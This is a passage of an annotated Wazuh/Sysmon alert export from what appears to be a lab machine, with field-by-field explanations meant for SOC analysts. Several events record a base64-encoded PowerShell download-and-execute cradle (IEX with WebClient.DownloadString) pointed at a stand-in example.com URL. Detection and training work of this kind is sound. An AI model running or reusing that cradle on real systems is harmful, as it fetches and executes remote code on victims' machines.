No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:55.313 ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} ProcessId: 13984 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} ParentProcessId: 9788 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:55.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b7-680a-0c0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1b2-680a-0a0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9788
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:58.805+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:58.805+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  141
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535418.2942275
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:57.0976263Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351055
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:57.052 ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} ProcessId: 13984 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1 CreationUtcTime: 2025-04-24 22:56:57.052 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:57.052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b7-680a-0c0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:57.052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:02.278+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:02.278+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  138
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535422.2945044
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:00.2839410Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351088
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:58.730 ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} ProcessId: 16768 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} ParentProcessId: 13984 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:58.730
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1ba-680a-0e0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16768
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1b7-680a-0c0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:03.194+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:03.194+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  142
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535423.2953115
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:00.5874879Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351089
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:00.548 ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} ProcessId: 16768 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_x0prsnfi.525.ps1 CreationUtcTime: 2025-04-24 22:57:00.545 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:00.548
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1ba-680a-0e0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16768
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_x0prsnfi.525.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:00.545
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:05.701+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:05.701+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  139
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535425.2955884
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:03.1389988Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351116
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

